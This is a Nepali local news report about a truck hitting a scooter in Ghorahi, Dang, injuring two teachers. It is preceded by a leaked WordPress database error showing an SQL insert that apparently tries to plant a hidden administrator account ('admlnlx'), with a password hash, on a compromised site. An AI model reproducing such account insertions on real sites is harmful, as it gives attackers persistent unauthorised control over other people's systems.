WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiHUCHsvuopDq5PO3Ax5K4u4IC619E/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 06:50:16', '', 'admlnlx', 'admlnlx')
विकास डाँगी
दाङ माघ १९-
दाङको घोराहीमा ट्रकको ठक्करबाट स्कूटरमा सवार दुई महिला घाइते भएका छन्। घाइतेमध्ये घोराही-६ निवासी ३० वर्षीया वसन्ता गौतमको अवस्था गम्भीर रहेको जिल्ला प्रहरी कार्यालय दाङले जनाएको छ। सोही ठाउँकी सिर्जना भट्ट सामान्य घाइते छिन्। घाइते दुवै स्थानीय जनज्योति बोर्डिङ स्कूलका शिक्षिका हुन्। उनीहरुको राप्ती उपक्षेत्रीय अस्पतालमा उपचार भइरहेको प्रहरीले जनाएको छ। गम्भीर घाइते गौतमलाई काठमाडौं रिफर गर्ने तयारी गरिँदैछ।
घोराहीको दामोदर चोक नजिकै स्थानीय तरकारी मण्डीबाट तरकारी बोकेर निस्किँदै गरेको लु १ ख ६८९३ नम्बरको ट्रकले विद्यालयमा सरस्वती पूजा गर्न जाँदै गरेका शिक्षिकाहरु चढेको रा २ प ८९६३ नम्बरको स्कूटीलाई बुधबार बिहान ठक्कर दिएको थियो । गम्भीर घाइते भएकी गौतम स्कूटरमा पछाडि बसेकी थिइन्।